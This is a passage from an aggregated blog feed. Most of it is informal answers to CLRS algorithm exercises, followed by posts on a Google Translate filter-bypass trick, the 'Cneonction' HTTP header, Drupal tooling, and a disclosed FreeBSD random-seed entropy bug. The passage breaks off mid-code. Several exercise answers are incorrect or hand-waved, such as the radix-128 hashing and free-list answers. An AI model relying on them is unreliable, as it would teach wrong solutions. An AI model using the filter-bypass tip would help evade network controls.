    1. Go through the list and compare every even index to its immediate right (odd) index. Sort each pair in place so the smaller value lands at the even index. This step takes $\dfrac{1}{2}n$ comparisons.
    2. Find the minimum among the even indexes and the maximum among the odd indexes using the typical algorithm. This step takes $n$ comparisons.

    Note that this could be done in one pass by doing the pair comparison and the min/max comparison in one pass.

    Is there a better way?
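    Combining both steps into a single pass, as noted above, looks roughly like this in Python (the function name and details are mine):

```python
def min_max(nums):
    """Find (min, max) with about 1.5n comparisons via the pairwise scheme."""
    if not nums:
        raise ValueError("empty input")
    nums = list(nums)
    if len(nums) % 2:
        lo = hi = nums[-1]   # odd length: seed both with the leftover element
        nums = nums[:-1]
    else:
        lo = hi = nums[0]    # will be corrected by its own pair below
    for i in range(0, len(nums), 2):
        a, b = nums[i], nums[i + 1]
        if a > b:            # 1 comparison per pair ...
            a, b = b, a
        if a < lo:           # ... plus 1 against the running min ...
            lo = a
        if b > hi:           # ... plus 1 against the running max: 3 per 2 elements
            hi = b
    return lo, hi

print(min_max([3, 1, 4, 1, 5, 9, 2, 6]))  # (1, 9)
```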

    by Eitan Adler at October 31, 2012 12:44 PM

    Blogging my way through CLRS Section 11.1 (edition 2)

    I've taken a brief break from blogging about my Cormen readings but I decided to write up the answers to chapter 11. Note that the chapters and question numbers may not match up because I'm using an older edition of the book.
    Question 11.1-1:

    Suppose that a dynamic set $S$ is represented by a direct address table $T$ of length $m$. Describe a procedure that finds the maximum element of $S$. What is the worst case performance of your procedure?

    Assuming the addresses are sorted by key: start at the end of the direct address table and scan downward until a non-empty slot is found; that slot holds the maximum. If the addresses are not sorted:

    1. Initialize $max$ to $-\infty$
    2. Start at the first address in the table and scan downward until a used slot is found. If you reach the end goto #5
    3. Compare key to $max$. If it is greater assign it to $max$
    4. Goto #2
    5. Return $max$

    The performance of this algorithm is $\Theta(m)$. A slightly smaller bound for the sorted case is $\Theta(m - max)$

    Question 11.1-2:

    Describe how to use a bit vector to represent a dynamic set of distinct elements with no satellite data. Dictionary operations should run in $O(1)$ time.

    Initialize a bit vector of length $|U|$ to all $0$s. When storing key $k$, set the $k$th bit; when deleting key $k$, clear the $k$th bit. This is $O(1)$ even in a non-transdichotomous model, though it may be slower.
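    As a sketch in Python (the bytearray-backed class and its method names are illustrative, not from the post):

```python
class BitVectorSet:
    """Direct-address dictionary over keys 0..universe-1, no satellite data."""
    def __init__(self, universe_size):
        self.bits = bytearray((universe_size + 7) // 8)

    def insert(self, k):
        self.bits[k >> 3] |= 1 << (k & 7)     # set the kth bit

    def delete(self, k):
        self.bits[k >> 3] &= ~(1 << (k & 7))  # clear the kth bit

    def search(self, k):
        return bool(self.bits[k >> 3] & (1 << (k & 7)))

s = BitVectorSet(100)
s.insert(42)
print(s.search(42))  # True
s.delete(42)
print(s.search(42))  # False
```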

    Question 11.1-3:

    Suggest how to implement a direct address table in which the keys of stored elements do not need to be distinct and the elements can have satellite data. All three dictionary operations must take $O(1)$ time.

    Each element in the table should be a pointer to the head of a linked list containing the satellite data. $nil$ can be used for non-existent items.

    Question 11.1-4:

    We wish to implement a dictionary by using direct addressing on a large array. At the start the array entries may contain garbage, and initializing the entire array is impractical because of its size. Describe a scheme for implementing a direct address dictionary on the array. Dictionary operations should take $O(1)$ time. Using an additional stack with size proportional to the number of stored keys is permitted.

    On insert, the array address is pushed onto the stack, and the array element is set to the index of that entry in the stack.

    On search, the array element's value is checked to see if it points into the stack. If it does, the stack entry is checked to see if it points back to the array element.[1]

    On delete, the array element can be set to a value not pointing into the stack, but this isn't required. If the element points to the top of the stack, the top is simply popped off. If it points into the middle of the stack, the top entry and the key's entry are swapped and then the pop is performed. In addition, the array slot that the old top entry pointed to must be updated to point to the new location.
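    The scheme is easier to see in code. A hedged Python sketch, simulating the "garbage" array with random values; the validity check is exactly the back-pointer test of footnote [1]:

```python
import random

class LazyDirectTable:
    def __init__(self, size):
        # Simulate an uninitialized array with random garbage.
        self.T = [random.randrange(size) for _ in range(size)]
        self.stack = []  # holds (key, satellite data) pairs

    def _valid(self, k):
        i = self.T[k]
        return 0 <= i < len(self.stack) and self.stack[i][0] == k

    def insert(self, k, v):
        if self._valid(k):
            self.stack[self.T[k]] = (k, v)  # overwrite existing entry
        else:
            self.T[k] = len(self.stack)     # point the slot into the stack...
            self.stack.append((k, v))       # ...and the stack back at the slot

    def search(self, k):
        return self.stack[self.T[k]][1] if self._valid(k) else None

    def delete(self, k):
        if self._valid(k):
            i = self.T[k]
            top_key, top_val = self.stack[-1]
            self.stack[i] = (top_key, top_val)  # swap the top into the hole
            self.T[top_key] = i                 # repoint the moved key
            self.stack.pop()

t = LazyDirectTable(1000)
t.insert(5, "five")
t.insert(7, "seven")
print(t.search(5), t.search(6))  # five None
t.delete(5)
print(t.search(5), t.search(7))  # None seven
```

    Note that random garbage in T can never spoof `_valid`: an entry `stack[i]` with key k exists only if k was genuinely inserted, in which case T[k] was set to point at it.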

    Question 11.2-1:

    Suppose we use a hash function $h$ to hash $n$ distinct keys into an array $T$ of length $m$. Assuming simple uniform hashing, what is the expected number of collisions?

    Each pair of distinct keys collides with probability $1/m$, so by linearity of expectation over all $\binom{n}{2}$ pairs we would expect $\binom{n}{2}\frac{1}{m} = \frac{n(n-1)}{2m}$ collisions.

    Question 11.2-2:

    Demonstrate the insertion of the keys: $5, 28, 19, 15, 20, 33, 12, 17, 10$ into a hash table with 9 slots and $h(k) = k \mod{9}$[2]

    1: 28 -> 19 -> 10
    2: 20
    3: 12
    5: 5
    6: 15 -> 33
    8: 17
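    The table can be reproduced with a short script (appending at the tail so each chain reads in insertion order; CLRS's CHAINED-HASH-INSERT actually prepends at the head, which would reverse the chains):

```python
def chained_hash(keys, m):
    """Hash with chaining under h(k) = k mod m."""
    table = [[] for _ in range(m)]
    for k in keys:
        table[k % m].append(k)  # tail insertion, for readable output
    return table

table = chained_hash([5, 28, 19, 15, 20, 33, 12, 17, 10], 9)
for slot, chain in enumerate(table):
    if chain:  # unused slots not shown
        print(slot, " -> ".join(map(str, chain)))
```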

    Question 11.2-3:

    If the keys were stored in sorted order how is the running time for successful searches, unsuccessful searches, insertions, and deletions affected under the assumption of simple uniform hashing?

    Successful and unsuccessful searches are largely unaffected, although small gains can be achieved if the search bails out early once it finds a key later in the sort order than the one being searched for.

    Insertions are the most affected operation. The time is changed from $\Theta(1)$ to $O(n/m)$

    Deletions are unaffected. If the list was doubly linked the time remains $O(1)$. If it was singly linked the time remains $O(1 + \alpha)$

    Question 11.2-4:

    Suggest how storage for elements can be allocated and deallocated within the hash table by linking all unused slots into a free list. Assume one slot can store a flag and either one element or two pointers. All dictionary operations should run in $O(1)$ expected time.

    Initialize all the values to a singly linked free list (flag set to false) with a head and tail pointer. On insert, use the memory pointed to by the head pointer and set the flag to true for the new element and increment the head pointer by one. On delete, set the flag to false and insert the newly freed memory at the tail of the linked list.

    Question 11.2-5:

    Show that if $|U| > nm$ with $m$ the number of slots, there is a subset of $U$ of size $n$ consisting of keys that all hash to the same slot, so that the worst case searching time for hashing with chaining is $\Theta(n)$

    Assume the worst case of $|U|$ keys in the hash table. In the optimal case of simple uniform hashing, all $m$ slots will have $|U|/m \gt n$ items. Removing the assumption of uniform hashing allows some chains to become shorter at the expense of other chains becoming longer. There are more items than slots, so at least one slot must have at least $n$ items by the pigeonhole principle.

    Question 11.3-1:

    Suppose we wish to search a linked list of length $n$, where every element contains a key $k$ along with a hash value $h(k)$. Each key is a long character string. How might we take advantage of the hash values when searching the list for an element of a given key?

    You can use $h(k)$ to create a bloom filter of the strings in the linked list. This is a $\Theta(1)$ check to determine whether it is possible that a string appears in the linked list.

    Additionally, you can create a hash table of pointers to elements in the linked list with that hash value. This way you only check a subset of the linked list. Alternatively, one can keep the hash of the value stored in the linked list as well, compare the hash of the search value to the hash of each item, and only do the long comparison when the hashes match.
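    A sketch of the "store the hash alongside the key" variant (the names, and the use of Python's built-in hash as the stand-in h(k), are my own):

```python
def find(nodes, key):
    # nodes is a list of (stored_hash, key, payload) triples standing in for
    # the linked list; each node keeps h(k) next to its long string key.
    target = hash(key)
    for stored_hash, stored_key, payload in nodes:
        # Cheap integer comparison first; the expensive full-string
        # comparison runs only when the hashes match.
        if stored_hash == target and stored_key == key:
            return payload
    return None

nodes = [(hash(k), k, i) for i, k in enumerate(["alpha", "beta", "gamma"])]
print(find(nodes, "beta"))   # 1
print(find(nodes, "delta"))  # None
```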

    Question 11.3-2:

    Suppose that a string of length $r$ is hashed into $m$ slots by treating it as a radix-128 number and then using the division method. The number $m$ is easily represented as a 32 bit word but the string of $r$ character treated as a radix-128 number takes many words. How can we apply the division method to compute the hash of the character string without using more than a constant number of words outside of the string itself?

    Instead of treating the word as a radix-128 number, some form of combination could be used. For example, you may add the values of each character together modulo 128.
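    A different standard answer, for comparison: apply the division method directly by reducing modulo $m$ after every Horner step, so the running value always fits in a constant number of words. This is an alternative to the summing scheme above, not a restatement of it:

```python
def hash_radix128(s, m):
    """Division-method hash of a radix-128 string in O(1) extra words."""
    h = 0
    for ch in s:
        # (h*128 + c) mod m never exceeds 128*m, so it fits in one word
        # when m fits in 32 bits.
        h = (h * 128 + ord(ch)) % m
    return h

# Sanity check against computing the full radix-128 number first:
from functools import reduce
m = 701  # any modulus that fits in a 32-bit word
s = "hello"
full_value = reduce(lambda acc, ch: acc * 128 + ord(ch), s, 0)
print(hash_radix128(s, m) == full_value % m)  # True
```

    The two agree because $(a \cdot 128 + c) \bmod m = (((a \bmod m) \cdot 128) + c) \bmod m$.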

    Question 11.3-4:

    Consider a hash table of size $m = 1000$ and a corresponding hash function $h(k) = \lfloor m (k A \mod{1})\rfloor$ for $ A = \frac{\sqrt{5} - 1}{2}$ Compute the locations to which the keys 61, 62, 63, 64, 65 are mapped.
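    The post leaves this one unanswered; a quick, hedged computation (plain floating point is adequate at this scale) gives the slots:

```python
import math

A = (math.sqrt(5) - 1) / 2  # the constant from the question
m = 1000

def h(k):
    # Multiplication method: floor(m * fractional part of k*A)
    return math.floor(m * ((k * A) % 1))

print([h(k) for k in (61, 62, 63, 64, 65)])  # [700, 318, 936, 554, 172]
```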

    1. This is required because it is possible that the random garbage in the array points to the stack by random chance
    2. unused slots not shown

    by Eitan Adler at October 31, 2012 12:44 PM

    Blogging my way through CLRS section 3.1 [part 5]

    Part 4 here.
    I wrote an entire blog post explaining the answers to 2.3 but Blogger decided to eat it. I don't want to redo those answers so here is 3.1:
    From now on I will title my posts with the section number as well, to help Google.

    Question 3.1-1: Let $f(n)$ and $g(n)$be asymptotically non-negative functions. Using the basic definition of $\theta$-notation, prove that $\max(f(n) , g(n)) \in \theta(f(n) + g(n))$ .

    CLRS defines $\theta$ as $\theta(g(n))= \{ f(n) :$ there exist some positive constants $c_1, c_2$, and $n_0$ such that $0 \leq c_1g(n) \leq f(n) \leq c_2g(n)$ for all $n \geq n_0\}$. Essentially we must prove that there exist some $c_1$ and $c_2$ such that $c_1 \times (f(n) + g(n)) \leq \max(f(n), g(n)) \leq c_2 \times (f(n) + g(n))$. There are a variety of ways to do this but I will choose the easiest way I could think of. We know that $\max(f(n), g(n)) \leq f(n) + g(n)$ (as $f(n)$ and $g(n)$ must both be non-negative), and we further know that $f(n) + g(n)$ can't be more than twice $\max(f(n), g(n))$. What we have then are the following inequalities: $$\max(f(n), g(n)) \leq 1 \times (f(n) + g(n))$$ and $$\frac{1}{2} \times (f(n) + g(n)) \leq \max(f(n), g(n))$$ So $c_1 = \frac{1}{2}$ and $c_2 = 1$ satisfy the definition.

    Question 3.1-2: Show for any real constants $a$ and $b$ where $b \gt 0$ that $(n+a)^b \in \theta(n^b)$
    Because $a$ is a constant and the definition of $\theta$ is true after some $n_0$ adding $a$ to $n$ does not affect the definition and we simplify to $n^b \in \theta(n^b)$ which is trivially true

    Question 3.1-3: Explain why the statement "The running time of $A$ is at least $O(n^2)$," is meaningless.

    I'm a little uncertain of this answer but I think this is what CLRS is getting at when we say a function $f(n)$ has a running time of $O(g(n))$ what we really mean is that $f(n)$ has an asymptotic upper bound of $g(n)$. This means that $f(n) \leq g(n)$ after some $n_0$. To say a function has a running time of at least g(n) seems to be saying that $f(n) \leq g(n) \And f(n) \geq g(n)$ which is a contradiction.

    Question 3.1-4: Is $2^{n+1} = O(2^n)$? Is $2^{2n} = O(2^n)$?

    $2^{n+1} = 2 \times 2^n$, which means that $2^{n+1} \leq c \times 2^n$ after $n_0$, so we have our answer that $2^{n+1} \in O(2^n)$. Alternatively we could say that the two functions only differ by a constant coefficient and therefore the answer is yes.

    There is no constant such that $2^{2n} = c \times 2^n$ and therefore $2^{2n} \notin O(2^n)$

    Question 3.1-5: Prove that for any two functions $f(n)$ and $g(n)$, we have $f(n) \in \theta(g(n)) \iff f(n) \in O(g(n)) \And f(n) \in \Omega(g(n))$

    This is an "if and only if" problem so we must prove it in two parts:

    Firstly, if $f(n) \in O(g(n))$ then there exist some $c_1$ and $n_0$ such that $f(n) \leq c_1 \times g(n)$ after some $n_0$. Further, if $f(n) \in \Omega(g(n))$ then there exist some $c_2$ and $n_0$ such that $f(n) \geq c_2 \times g(n)$ after some $n_0$.

    If we combine the above two statements (which come from the definitions of $\Omega$ and $O$) then we know that there exist some $c_1, c_2$, and $n_0$ such that $c_2g(n) \leq f(n) \leq c_1g(n)$ for all $n \geq n_0$.

    We could do the same thing backward for the other direction: If $f(n) \in \theta(g(n))$ then we could split the above inequality and show that each of the individual statements are true.

    Question 3.1-6: Prove that the running time of an algorithm is $\theta(g(n)) \iff$ its worst-case running time is $O(g(n))$ and its best case running time $\Omega(g(n))$.
    I'm going to try for an intuitive proof here instead of a mathematical one. If the running time is asymptotically bounded from above by $g(n)$ in the worst case and asymptotically bounded from below by $g(n)$ in the best case, then it is tightly bound: $f(n)$ never goes below some constant times $g(n)$ and never goes above some constant times $g(n)$. This is what we get from the above definition of $\theta(g(n))$. A mathematical proof follows from question 3.1-5.

    Question 3.1-7: Prove that $o(g(n)) \cap \omega(g(n)) = \varnothing$

    little o and little omega are defined as follows: \[o(g(n)) = \{ f(n) : \forall c > 0\ \exists n_0 \text{ such that } 0 \leq f(n) \lt c \times g(n)\ \forall n \gt n_0\}\] and \[\omega(g(n)) = \{ f(n) : \forall c > 0\ \exists n_0 \text{ such that } 0 \leq c \times g(n) \lt f(n)\ \forall n \gt n_0\}\]

    In other words

    $$f(n) \in o(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = 0$$ and $$f(n) \in \omega(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = \infty$$

    It is obvious that these can not be true at the same time. This would require that $0 = \infty$

    by Eitan Adler at October 31, 2012 12:44 PM

    Blogging my way through CLRS [part 4]

    Part 3 here This set is a bit easier than last time.
    Question 2.2-1:Express the function $$\frac{n^3}{1000} - 100n^2 - 100n + 3$$ in terms of $\Theta$ notation
    A function g(x) is said to be in the set of all functions $\Theta(x)$ if and only if g(x) is also in the set of all functions $\Omega(x)$ and in the set of all functions $O(x)$.
    Symbolically: $$g(x) \in \Theta(x) \iff g(x) \in O(x) \And g(x) \in \Omega(x)$$

    A function g(x) is in the set of all functions $O(x)$ if and only if after some constant $c$ it is always true that for some constant C, $g(x) \lt Cf(x)$

    A function g(x) is in the set of all functions $\Omega(x)$ if and only if after some constant $c$ it is always true that for some constant C, $g(x) \gt Cf(x)$

    With our function we could choose practically any function to satisfy either one of these conditions. However we need to satisfy both of them. One thing that makes this easier is that it only has to be true after some constant number. This allows us to throw away the "trivial" parts that are eventually overwhelmed by the faster growing terms. We therefore are only left with $n^3$, which is the answer.

    Question 2.2-2: Consider sorting n numbers stored in an array A by first finding the smallest element and exchanging it with the element in A[1], then find the second smallest element and exchange it with A[2], and continue this for the first n-1 elements of A. Write the pseudocode for this algorithm, which is known as Selection Sort. What loop invariant does this algorithm maintain? Why does it need to run only for the first n-1 elements and not for all n? Give the best case and worst case running times in $\Theta$ notation
    This question is asking us to analyze selection sort in a variety of ways. I will start with writing out the pseudocode: for $j \leftarrow 1$ to $n-1$
       min $\leftarrow$ j
       for $i \leftarrow j+1$ to $n$
     if A[i] < A[min] then min $\leftarrow$ i
    if min $\neq$ j then swap A[min] and A[j]
    A loop invariant that this algorithm maintains is that every element prior to A[j] is sorted within the subarray A[1] to A[j] and is less than or equal to every element in the subarray A[j+1] to A[n]. I do not believe a stronger loop invariant is provable. The algorithm only needs to run until n-1 because of the second part of the loop invariant. When $j = n-1$ we know that every element after A[j], which is just A[n], is not less than all previous elements. Therefore no check has to be done. In the best case (an already sorted array) and in the worst case (a reverse sorted array) the running time is the same: $\Theta(n^2)$
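    The pseudocode above translates directly to Python (0-indexed):

```python
def selection_sort(A):
    """Selection sort: fix positions 0..n-2; the last slot falls into place."""
    n = len(A)
    for j in range(n - 1):
        m = j  # index of the smallest element seen in A[j..n-1]
        for i in range(j + 1, n):
            if A[i] < A[m]:
                m = i
        if m != j:
            A[j], A[m] = A[m], A[j]
    return A

print(selection_sort([5, 2, 4, 6, 1, 3]))  # [1, 2, 3, 4, 5, 6]
```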
    Question 2.2-3: Consider linear search again. How many elements of the input sequence need to be checked on average, assuming that the element being searched for is equally likely to be any element in the array? How about in the worst case? What are the average-case and worst-case running times of linear search in $\Theta$ notation?
    The best case for a linear search algorithm is when the searched-for element is in the first location. In the worst case all n locations must be searched. In the average case $\frac{n}{2}$ locations have to be searched. In $\Theta$-notation the average and worst cases are both $\Theta(n)$.
    Question 2.2-4: How can we modify almost any algorithm to have a good best-case running time?
    I have no idea what this question is asking for. I guess checking for the optimal case (as in a pre-sorted array for a sorting algorithm) and then skipping the rest of the procedure might work.

    by Eitan Adler at October 31, 2012 12:44 PM

    Blogging my way through CLRS [3/?]

    part 2 here
    According to Wikipedia, Introduction to Algorithms is also known as CLRS, which is shorter (and more fair to the other authors), so I'll use that name from now on.

    Question 2.1-1 asks me to redraw a previous diagram, but with different numbers. I am not going to post that here.
    Question 2.1-2Rewrite the insertion sort procedure to sort into nonincreasing instead of nondecreasing order:
    Here is the pseudocode of the nonincreasing version of insertion sort: for j $ \leftarrow 2$ to length[A]
      do key$ \leftarrow A[j]$
         $\rhd$ Insert A[j] into sorted sequence A[1..j-1]
        $ i \leftarrow j - 1$
        while $i \gt 0$ AND $A[i] \lt key$
          do $A[i+1] \leftarrow A[i]$
             $i \leftarrow i - 1$
        $A[i+1] \leftarrow key$

    Now we prove that this loop correctly terminates with a nonincreasing array to about the same level of formality as the book proved the original.
    Initialization: At the first iteration, when $j=2$ the subarray A[1..j-1] is trivially sorted (as it has only one element).
    Maintenance: In order to prove maintenance we need to show that the inner loop correctly terminates with an array with "space" for the correct element. As CLRS did not prove this property, I will also skip this proof.
    Termination: this loop terminates when j > length[A] or when $j = length[A]+1$. Since we have "proven" (to some level) the maintenance of the loop invariant (that at each point during the loop the subarray [1..j-1] is sorted) we could substitute length[A]+1 for $j$ which becomes [1..length[A]] or the entire array.
    This shows that the loop terminates with a correctly sorted array.
    Question 2.1-3:
    Input:A sequence of $n$ numbers $A = {a_1,a_2,...,a_n}$ and a value $v$.
    Output: An index i such that $v = A[i]$ or a special value $\varnothing$ (NIL) if $v \notin A$
    Write the pseudocode for Linear Search, which scans through the sequence looking for $v$. Using a loop invariant, prove that your algorithm is correct.
    The first part, writing the pseudocode, seems fairly easy:
    $r \leftarrow \varnothing$
    for $j \leftarrow 1$ to length[A]
       if $v = A[j] \rhd$ optionally check that $r = \varnothing$
         $r \leftarrow j$
    return $r$

    The second part, proving that this is correct is harder than before because we don't have a trivially true initialization of our loop invariant.
    Initialization: $j = 1\ \And\ r = \varnothing$ at the start of our loop. At this point there are no elements prior to A[j] and we have yet to find $v$ in A. As such our invariant (that r will contain the correct value) is true.
    Maintenance: At every point in the loop the subarray A[1..j] has either contained $v$ in which case it has been assigned to $r$ or has not contained $v$ in which case $r$ remains $\varnothing$. This means that loop invariant holds for every subarray A[1..j].
    Termination: At the end of the loop $j = $ length[A]. We know from our maintenance that $r$ is correct for every subarray A[1..j] so at termination $r$ contains the correct value
    Question 2.1-4 Consider the problem of adding two $l$-bit binary integers, stored in two $l$-element arrays $A$ and $B$. the sum of the two integers should be stored in binary form in $(l+1)$-element array $C$. State the problem formally and write pseudocode for adding the integers.
    Stating the problem formally looks something like:
    Input: Two $l$-bit integers $A$ and $B$ stored as arrays of length $l$ with the most significant bit stored last
    Output: An $l+1$-bit integer ($C$) stored as arrays of length $l+1$ with the most significant bit stored last
    Here is the pseudocode: $\rhd$ X is an $(l+1)$-bit array of bits initialized to all zeros in order to store the carry
    for j $\leftarrow$ 1 to $l$
       $copyC \leftarrow A[j] \oplus B[j]$
       $C[j] \leftarrow copyC \oplus X[j]$
       $X[j+1] \leftarrow (A[j] \And B[j]) \lor (copyC \And X[j])$
    $C[l+1] \leftarrow X[l+1]$
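    A Python translation of the ripple-carry idea (least-significant bit first, matching the arrays above; the carry update is the standard full-adder formula):

```python
def add_binary(A, B):
    """Add two l-bit arrays (LSB first), returning an (l+1)-bit array."""
    l = len(A)
    C = [0] * (l + 1)
    carry = 0
    for j in range(l):
        s = A[j] ^ B[j]
        C[j] = s ^ carry                    # sum bit
        carry = (A[j] & B[j]) | (s & carry) # full-adder carry-out
    C[l] = carry
    return C

# 6 (110) + 7 (111), LSB first:
print(add_binary([0, 1, 1], [1, 1, 1]))  # [1, 0, 1, 1] -> 13
```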

    by Eitan Adler at October 31, 2012 12:44 PM

    Blogging my way through Cormen [2/?]

    As I said in part 1 I am reading a book on algorithms and have decided to blog my way through. My primary goal in doing so is to improve my writing skills. A secondary goal is to force myself to actually answer the questions.

    1.2-2 Suppose we are comparing implementations of insertion sort and merge sort on the same machine. For inputs of size n, insertion sort runs in $8n^2$ steps, while merge sort runs in $64n \lg n$ steps. For which values of $n$ does insertion sort beat merge sort?
    The question is essentially asking for which values of $n$ is $8n^{2} \lt 64n \lg n$. We can solve this question by first factoring out an $8n$, which gives $n \lt 8 \lg n$. Unfortunately this inequality is not solvable using elementary operations. Luckily we are being asked for an integer solution (as computers operate in discrete steps) and we could use the underutilized guess-and-check method.
    $n$     $8 \lg n$
    14      30.46
    41      42.86
    43      43.41
    44      43.675
    So there we have it: given this data we would prefer insertion sort whenever we have 43 or fewer items.
    1.2-3 What is the smallest value of n such that an algorithm whose running time is $100n^2$ runs faster than an algorithm whose running time is $2^n$ on the same machine.
    This question is asking us to find the smallest positive integer $n$ that satisfies $100n^{2} \lt 2^n$. This could be solved by doing the math, by looking at a plot of the curves, or by using the above method again. $$2^{14} = 16384$$ $$(100 \times 14^{2}) = 19600$$ $$2^{15} = 32768$$ $$(100 \times 15^{2}) = 22500$$
    An exponential algorithm becomes far worse than a polynomial algorithm when we have only 15 items to worry about. In other words: avoid exponential algorithms!
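    Both guess-and-check searches (this one and the one in 1.2-2 above) are easy to confirm with a few lines of Python:

```python
from math import log2

# Smallest n at which insertion sort (8n^2) stops beating merge sort (64n lg n);
# start at n=2 to dodge the degenerate lg 1 = 0 case.
n1 = next(n for n in range(2, 1000) if 8 * n * n >= 64 * n * log2(n))
print(n1)  # 44, i.e. insertion sort wins for n <= 43

# Smallest n at which 100n^2 runs faster than 2^n:
n2 = next(n for n in range(1, 1000) if 100 * n * n < 2 ** n)
print(n2)  # 15
```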
    Thank you JT and JM for giving me the idea to go through the book, and for looking at my posts before I publish them.
    Updated 2012-09-05: I had a brain lapse the day I originally published this and accidentally used the natural logarithm instead of the base 2 log for question 1.2-2. How I ever managed to do that I will not know, but I've fixed it.

    by Eitan Adler at October 31, 2012 12:44 PM

    Google translate proxy no longer available

    One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

    I recently came across a link that happened to be using Google Translate in that way (I'm not sure why) and I got an error from Google:

    "Translation from English into English is not supported."

    When I tried with other languages I got similar errors. Translating to other languages works as usual.

    Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

    by Eitan Adler at October 31, 2012 11:56 AM

    Cneonction: closed HTTP header

    When you make a request to certain websites you may find a header that looks a little strange:

    [8000 eitan@radar ~ ]%curl -I 2>/dev/null|grep close
    Cneonction: close
    [8001 eitan@radar ~ ]%curl -I 2>/dev/null|grep close
    Cneonction: close

    This isn't a typo though. Some load balancers that sit between the web server and end user want to implement HTTP keep-alive without modifying the back end web server. The load balancer therefore has to add "Connection: Keep-Alive" to the HTTP header and also has to elide the "Connection: close" from the real webserver. However, if it completely removes the line the load balancer (acting as a TCP proxy) would have to stall before forwarding the complete text in order to recompute the TCP checksum. This increases latency on packet delivery.

    Instead, the proxy uses a hack to keep the checksum unchanged. The TCP checksum of a packet is the 1s complement summation of all the 16 bit words (the final word might be right padded with zeros).[1] By manipulating the ordering, but not the content of the header the proxy can avoid changing the TCP checksum except by the fixed amount that the "Connection: Keep-Alive" adds (2061).

    In particular:

    >>> sum(ord(i) for i in "Connection") - sum(ord(i) for i in "Cneonction")
    0
    This reordering also keeps the packet size the same.
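    The invariance is easy to check by summing 16-bit words directly (a sketch: a real TCP checksum also covers the rest of the segment and folds carries in 1s complement, but the argument only needs the word sums over the header text to match):

```python
def word_sum(data: bytes) -> int:
    """Sum of big-endian 16-bit words, right-padding a final odd byte with zero."""
    if len(data) % 2:
        data += b"\x00"
    return sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))

a = b"Connection: close\r\n"
b = b"Cneonction: close\r\n"
print(word_sum(a) - word_sum(b))  # 0
```

    The sums match because the reordering permutes bytes separately among the even (high-byte) and odd (low-byte) positions, so each byte keeps its weight in the sum.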

    1. RFC793
    Edit 2012-10-31: Make the RFC a link and remove pointless "2>&1"
    Thanks abbe for the inspiration! Thanks wxs for the proofreading.

    by Eitan Adler at October 31, 2012 11:45 AM

    October 23, 2012

    Nate Berry

    Ubuntu breathes new life into old MacBook

    Last year when I got an HP EliteBook for work I thought my days with the old MacBook were numbered. The MacBook isn’t that old, its a 2009 Core 2 Duo aluminum body 13″ model, but the EliteBook’s iCore 5 was is faster. The Mac screen is better, but not by very much. Both processors […]

    by Nate at October 23, 2012 11:27 PM

    October 21, 2012


    Drush: the Drupal shell utility

    Drush, while not strictly a module, is listed as a module for lack of a better classification. Drush is a set of shell scripts that can be used to better manage Drupal installations: it actually does a limited bootstrap of the Drupal environment, connecting to the database that it finds in the nearest settings.php file.


    by lipcpro at October 21, 2012 12:59 AM

    October 20, 2012


    Drupal Best Practices (or just good ideas)

    My notes from a presentation I gave at the meeting

    Q. Why Is it important to practice good programming habits?

    A. Following best practices and thoughtful planning from the beginning will ensure a well-received project outcome, limiting mistakes while speeding development.

    by lipcpro at October 20, 2012 06:52 PM

    October 10, 2012

    Eitan Adler

    Reduced Entropy in rand() and random()

    TL;DR: Don't rely on undefined behavior, even when you think it should work.

    I recently reported a minor issue to the FreeBSD security team.

    The libc random functions had code[1][2] designed to run when /dev/random is not available. This can easily occur in a chroot or jail environment.

    if (!done) {
            struct timeval tv;
            unsigned long junk;

            gettimeofday(&tv, NULL);
            srandom((getpid() << 16) ^ tv.tv_sec ^ tv.tv_usec ^ junk);
    }

    This code is designed to provide a minimal amount of entropy in the "failure" case. Unfortunately, it doesn't even provide the entropy it claims to. This is a minor issue because getpid, gettimeofday, and a single long variable don't provide a lot of entropy in the first place (only log2(sizeof(long)) bits).

    The point of the junk value is to add entropy by using uninitialized memory. This relies on the compiler being "stupid" enough not to optimize it away.

    Unfortunately clang and newer versions of gcc are smart enough to use the undefined behavior in undesired ways.

    clang [3] removes any computation which relies on the undefined behavior and so produces the following object code:

    af0: e8 5f fc ff ff callq 754 <gettimeofday@plt>
    af5: e8 7a fc ff ff callq 774 <getpid@plt>
    afa: e8 65 fc ff ff callq 764 <srandom@plt>

    Note that the junk variable is entirely unused and that the xor operation between gettimeofday and getpid is non-existent.

    gcc 4.6 [4] outputs:

    ce8: e8 03 fa ff ff callq 6f0 <gettimeofday@plt>
    ced: e8 4e fa ff ff callq 740 <getpid@plt>
    cf2: 48 8b 7c 24 08 mov 0x8(%rsp),%rdi
    cf7: 48 33 3c 24 xor (%rsp),%rdi
    cfb: c1 e0 10 shl $0x10,%eax
    cfe: 48 98 cltq
    d00: 48 31 c7 xor %rax,%rdi
    d03: e8 28 fa ff ff callq 730 <srandom@plt>
    Note that in this case the junk value appears to be (%rsp) which isn't all that random.

    gcc 4.2 [5] produces the following code with the junk variable:

    d9f: e8 18 fa ff ff callq 7bc <gettimeofday@plt>
    da4: e8 43 fa ff ff callq 7ec <getpid@plt>
    da9: 48 8b 3c 24 mov (%rsp),%rdi
    dad: 48 33 7c 24 08 xor 0x8(%rsp),%rdi
    db2: c1 e0 10 shl $0x10,%eax
    db5: 48 98 cltq
    db7: 48 31 c7 xor %rax,%rdi
    dba: 48 31 df xor %rbx,%rdi
    dbd: e8 1a fa ff ff callq <srandom@plt>
    and without:

    d9f: e8 18 fa ff ff callq 7bc <gettimeofday@plt>
    da4: e8 43 fa ff ff callq 7ec <getpid@plt>
    da9: 48 8b 3c 24 mov (%rsp),%rdi
    dad: 48 33 7c 24 08 xor 0x8(%rsp),%rdi
    db2: c1 e0 10 shl $0x10,%eax
    db5: 48 98 cltq
    db7: 48 31 c7 xor %rax,%rdi
    dba: e8 1d fa ff ff callq 7dc <srandom@plt>

    The base version of gcc isn't vulnerable. However, with the upcoming switch to the clang compiler, FreeBSD does become vulnerable.

    The first proposed fix was to add the volatile type qualifier to the junk variable. While this seemed to fix the code generation issue, I didn't believe this to be a valid fix as the behavior is still undefined [6] (I misread the text of the standard). Additionally, the value is likely to be very predictable. A preference was expressed to remove the junk variable, as using it may leak a small amount of stack data.

    I proposed the simple and obvious fix of removing the use of the junk variable [7].
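    Paraphrasing the committed fix, the fallback seeding ends up along these lines (a sketch, not the exact FreeBSD code):

```c
#include <sys/time.h>
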